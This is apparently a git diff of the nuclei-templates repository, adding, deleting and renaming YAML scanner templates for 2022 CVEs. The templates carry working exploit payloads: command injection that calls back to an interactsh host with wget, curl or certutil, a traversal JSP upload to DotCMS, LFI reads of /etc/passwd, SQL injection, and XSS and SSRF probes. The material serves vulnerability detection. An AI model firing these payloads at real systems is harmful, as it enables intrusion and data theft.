nuclei-templates/CVE-2022/cve-2022-22947.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-22954.yaml b/nuclei-templates/CVE-2022/cve-2022-22954.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-22954.yaml rename to nuclei-templates/CVE-2022/cve-2022-22954.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23347.yaml b/nuclei-templates/CVE-2022/cve-2022-23347.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23347.yaml rename to nuclei-templates/CVE-2022/cve-2022-23347.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-23779.yaml b/nuclei-templates/CVE-2022/cve-2022-23779.yaml new file mode 100644 index 0000000000..e42ca66955 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23779.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-23779 + +info: + name: Zoho ManageEngine - Internal Hostname Disclosure + author: cckuailong + severity: medium + description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. + reference: + - https://www.manageengine.com/products/desktop-central/cve-2022-23779.html + - https://github.com/fbusr/CVE-2022-23779 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23779 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-23779 + cwe-id: CWE-200 + metadata: + fofa-query: app="ZOHO-ManageEngine-Desktop" + tags: cve,cve2022,zoho,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/themes" + + matchers-condition: and + matchers: + - type: status + status: + - 301 + + - type: word + part: header + words: + - '/themes/' + - 'text/html' + condition: and + + - type: word + part: location + words: + - '{{Host}}' + negative: true + + - type: word + words: + - '<center><h1>301 Moved Permanently</h1></center>' + + - type: regex + part: location + regex: + - 'https?:\/\/(.*):' + + extractors: + - type: regex + part: location + group: 1 + regex: + - 'https?:\/\/(.*):' + +# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23808.yaml b/nuclei-templates/CVE-2022/cve-2022-23808.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23808.yaml rename to nuclei-templates/CVE-2022/cve-2022-23808.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-23881.yaml b/nuclei-templates/CVE-2022/cve-2022-23881.yaml deleted file mode 100644 index 73150a422c..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-23881.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-23881 - -info: - name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution - author: pikpikcu - severity: critical - description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. - reference: - - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - - http://www.zzzcms.com - - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23881 - cwe-id: CWE-77 - tags: cve,cve2022,rce,zzzphp,zzzcms - -requests: - - raw: - - | - GET /?location=search HTTP/1.1 - Host: {{Hostname}} - Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 500 - -# Enhanced by mp on 2022/04/19 diff --git a/nuclei-templates/CVE-2022/cve-2022-24681.yaml b/nuclei-templates/CVE-2022/cve-2022-24681.yaml new file mode 100644 index 0000000000..cb02386823 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24681.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-24681 + +info: + name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting + author: Open-Sec + severity: medium + description: | + ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. + reference: + - https://raxis.com/blog/cve-2022-24681 + - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html + - https://manageengine.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24681 + cwe-id: CWE-79 + tags: cve,cve2022,manageengine,xss,authenticated + +requests: + - raw: + - | + POST /servlet/GetProductVersion HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: body + name: buildnumber + group: 1 + regex: + - '"BUILD_NUMBER":"([0-9]+)",' + internal: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(buildnumber, '< 6121') + + - type: word + part: body + words: + - "ManageEngine" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-24856.yaml b/nuclei-templates/CVE-2022/cve-2022-24856.yaml deleted file mode 100644 index 0dd01066ff..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-24856.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2022-24856 - -info: - name: Flyte Console <0.52.0 - Server-Side Request Forgery - author: pdteam - severity: high - description: | - FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. - reference: - - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9 - - https://github.com/flyteorg/flyteconsole/pull/389 - - https://hackerone.com/reports/1540906 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24856 - remediation: | - The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-24856 - cwe-id: CWE-918 - tags: cve,cve2022,flyteconsole,ssrf,oss,hackerone - -requests: - - method: GET - path: - - "{{BaseURL}}/cors_proxy/https://www.interact.sh" - - matchers: - - type: word - words: - - "Interactsh Server" - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-2486.yaml b/nuclei-templates/CVE-2022/cve-2022-2486.yaml new file mode 100644 index 0000000000..bf397b6486 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-2486.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-2486 + +info: + name: Wavlink WN535K2/WN535K3 - OS Command Injection + author: For3stCo1d + severity: critical + description: | + Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + reference: + - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 + - https://vuldb.com/?id.204537 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2486 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2486 + cwe-id: CWE-78 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: cve,cve2022,iot,wavlink,router,rce,oast + +requests: + - raw: + - | + GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 500 + +# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/cve-2022-2487.yaml b/nuclei-templates/CVE-2022/cve-2022-2487.yaml new file mode 100644 index 0000000000..e4ba8d4c26 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-2487.yaml @@ -0,0 +1,55 @@ +id: CVE-2022-2487 + +info: + name: Wavlink WN535K2/WN535K3 - OS Command Injection + author: For3stCo1d + severity: critical + description: | + Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + reference: + - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 + - https://vuldb.com/?id.204538 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2487 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2487 + cwe-id: CWE-78 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: cve,cve2022,iot,wavlink,router,rce,oast + +variables: + cmd: "id" + +requests: + - raw: + - | + @timeout: 10s + POST /cgi-bin/nightled.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=night_led&start_hour=;{{cmd}}; + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "uid=" + - "gid=" + - "nightStart" + condition: and + + - type: word + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/cve-2022-2488.yaml b/nuclei-templates/CVE-2022/cve-2022-2488.yaml deleted file mode 100644 index f4e04da2f6..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-2488.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-2488 - -info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection - author: For3stCo1d - severity: critical - description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 - - https://vuldb.com/?id.204539 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2488 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2488 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,iot,wavlink,router,rce,oast - -requests: - - raw: - - | - GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 500 - -# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml b/nuclei-templates/CVE-2022/cve-2022-25323.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-25323.yaml rename to nuclei-templates/CVE-2022/cve-2022-25323.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-26148.yaml b/nuclei-templates/CVE-2022/cve-2022-26148.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-26148.yaml rename to nuclei-templates/CVE-2022/cve-2022-26148.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-26159.yaml b/nuclei-templates/CVE-2022/cve-2022-26159.yaml deleted file mode 100644 index 41d6be2d94..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-26159.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-26159 - -info: - name: Ametys CMS Information Disclosure - author: Remi Gascou (podalirius) - severity: medium - description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - - https://podalirius.net/en/cves/2022-26159/ - - https://issues.ametys.org/browse/CMS-10973 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-26159 - tags: cve,cve2022,plugin,ametys,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' - - matchers-condition: and - matchers: - - type: word - words: - - '<auto-completion>' - - '<item>' - condition: and - - - type: word - part: header - words: - - 'text/xml' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/cve-2022-26352.yaml b/nuclei-templates/CVE-2022/cve-2022-26352.yaml new file mode 100644 index 0000000000..159d6dd4a0 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26352.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-26352 + +info: + name: DotCMS - Arbitrary File Upload + author: h1ei1 + severity: critical + description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. + reference: + - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ + - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 + - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-26352 + cwe-id: CWE-22,CWE-434 + tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive + +requests: + - raw: + - | + POST /api/content/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3 + + --------------------------aadc326f7ae3eac3 + Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp" + Content-Type: text/plain + + <% + out.println("CVE-2022-26352"); + %> + --------------------------aadc326f7ae3eac3-- + + - | + GET /{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "CVE-2022-26352")' + - 'status_code_2 == 200' + condition: and + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/cve-2022-26564.yaml b/nuclei-templates/CVE-2022/cve-2022-26564.yaml new file mode 100644 index 0000000000..33e215310b --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-26564.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-26564 + +info: + name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting + author: alexrydzak + severity: medium + description: | + HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. + reference: + - https://rydzak.me/2022/04/cve-2022-26564/ + - https://www.hoteldruid.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-26564 + cwe-id: CWE-79 + metadata: + shodan-query: http.favicon.hash:-1521640213 + tags: cve,cve2022,hoteldruid,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>' + - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1' + - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<script>javascript:alert('XSS')</script>" + - "HotelDruid" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/09 diff --git a/nuclei-templates/CVE-2022/cve-2022-26960.yaml b/nuclei-templates/CVE-2022/cve-2022-26960.yaml deleted file mode 100644 index d244810944..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-26960.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-26960 - -info: - name: elFinder <=2.1.60 - Local File Inclusion - author: pikpikcu - severity: critical - description: | - elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. - reference: - - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html - - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db - - https://www.synacktiv.com/publications.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 9.1 - cve-id: CVE-2022-26960 - cwe-id: CWE-22 - metadata: - verified: true - tags: cve,cve2022,lfi,elfinder - -requests: - - raw: - - | - GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/05 diff --git a/nuclei-templates/CVE-2022/CVE-2022-27849.yaml b/nuclei-templates/CVE-2022/cve-2022-27849.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-27849.yaml rename to nuclei-templates/CVE-2022/cve-2022-27849.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-28079.yaml b/nuclei-templates/CVE-2022/cve-2022-28079.yaml new file mode 100644 index 0000000000..c1b122ba24 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28079.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-28079 + +info: + name: College Management System 1.0 - SQL Injection + author: ritikchaddha + severity: high + description: | + College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. + reference: + - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated + - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f + - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 + - https://code-projects.org/college-management-system-in-php-with-source-code/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28079 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,cms,collegemanagement + +variables: + num: "999999999" + +requests: + - raw: + - | + POST /admin/asign-single-student-subjects.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# + + matchers-condition: and + matchers: + - type: word + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-28080.yaml b/nuclei-templates/CVE-2022/cve-2022-28080.yaml deleted file mode 100644 index 021d8a2b18..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-28080.yaml +++ /dev/null @@ -1,72 +0,0 @@ -id: CVE-2022-28080 - -info: - name: Royal Event - SQL Injection - author: lucasljm2001,ekrause,ritikchaddha - severity: high - description: | - Royal Event is vulnerable to a SQL injection vulnerability. - reference: - - https://www.exploit-db.com/exploits/50934 - - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-28080 - tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms - -requests: - - raw: - - | - POST /royal_event/ HTTP/1.1 - Host: {{Hostname}} - Content-Length: 353 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD - - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="username" - - {{username}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="password" - - {{password}} - ------WebKitFormBoundaryCSxQll1eihcqgIgD - Content-Disposition: form-data; name="login" - - - ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - - - | - POST /royal_event/btndates_report.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="todate" - - 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="search" - - 3 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD - Content-Disposition: form-data; name="fromdate" - - 01/01/2011 - ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - words: - - '{{md5("{{randstr}}")}}' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-29298.yaml b/nuclei-templates/CVE-2022/cve-2022-29298.yaml deleted file mode 100644 index 2f75e09114..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29298.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2022-29298 - -info: - name: SolarView Compact 6.00 - Local File Inclusion - author: ritikchaddha - severity: high - description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files. - reference: - - https://www.exploit-db.com/exploits/50950 - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view - - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing - - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-29298 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: lfi,solarview,edb,cve,cve2022 - -requests: - - method: GET - path: - - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-29548.yaml b/nuclei-templates/CVE-2022/cve-2022-29548.yaml deleted file mode 100644 index 5b26802bf7..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-29548.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2022-29548 - -info: - name: WSO2 - Cross-Site Scripting - author: edoardottt - severity: medium - description: | - WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 - - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 - - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-29548 - cwe-id: CWE-79 - metadata: - google-query: inurl:"carbon/admin/login" - verified: "true" - tags: cve,cve2022,wso2,xss,packetstorm - -requests: - - method: GET - path: - - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "CARBON.showWarningDialog('???');alert(document.domain)//???" - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-30489.yaml b/nuclei-templates/CVE-2022/cve-2022-30489.yaml deleted file mode 100644 index 03406d9de4..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-30489.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2022-30489 - -info: - name: Wavlink WN-535G3 - Cross-Site Scripting - author: For3stCo1d - severity: medium - description: | - Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. - reference: - - https://github.com/badboycxcc/XSS-CVE-2022-30489 - - https://github.com/badboycxcc/XSS - - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30489 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: xss,cve2022,wavlink,cve,router,iot - -requests: - - raw: - - | - POST /cgi-bin/login.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn - - matchers-condition: and - matchers: - - type: word - words: - - '<script>alert(document.domain);</script>' - - 'parent.location.replace("http://")' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-30525.yaml b/nuclei-templates/CVE-2022/cve-2022-30525.yaml new file mode 100644 index 0000000000..12922c9a7a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-30525.yaml @@ -0,0 +1,43 @@ +id: CVE-2022-30525 + +info: + name: Zyxel Firewall - OS Command Injection + author: h1ei1,prajiteshsingh + severity: critical + description: | + An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. + reference: + - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ + - https://github.com/rapid7/metasploit-framework/pull/16563 + - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml + - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-30525 + cwe-id: CWE-78 + metadata: + shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" + tags: zyxel,cve,cve2022,firewall,unauth,kev,msf,rce + +requests: + - raw: + - | + POST /ztp/cgi-bin/handler HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/cve-2022-30777.yaml b/nuclei-templates/CVE-2022/cve-2022-30777.yaml new file mode 100644 index 0000000000..c7b81333ed --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-30777.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-30777 + +info: + name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting + 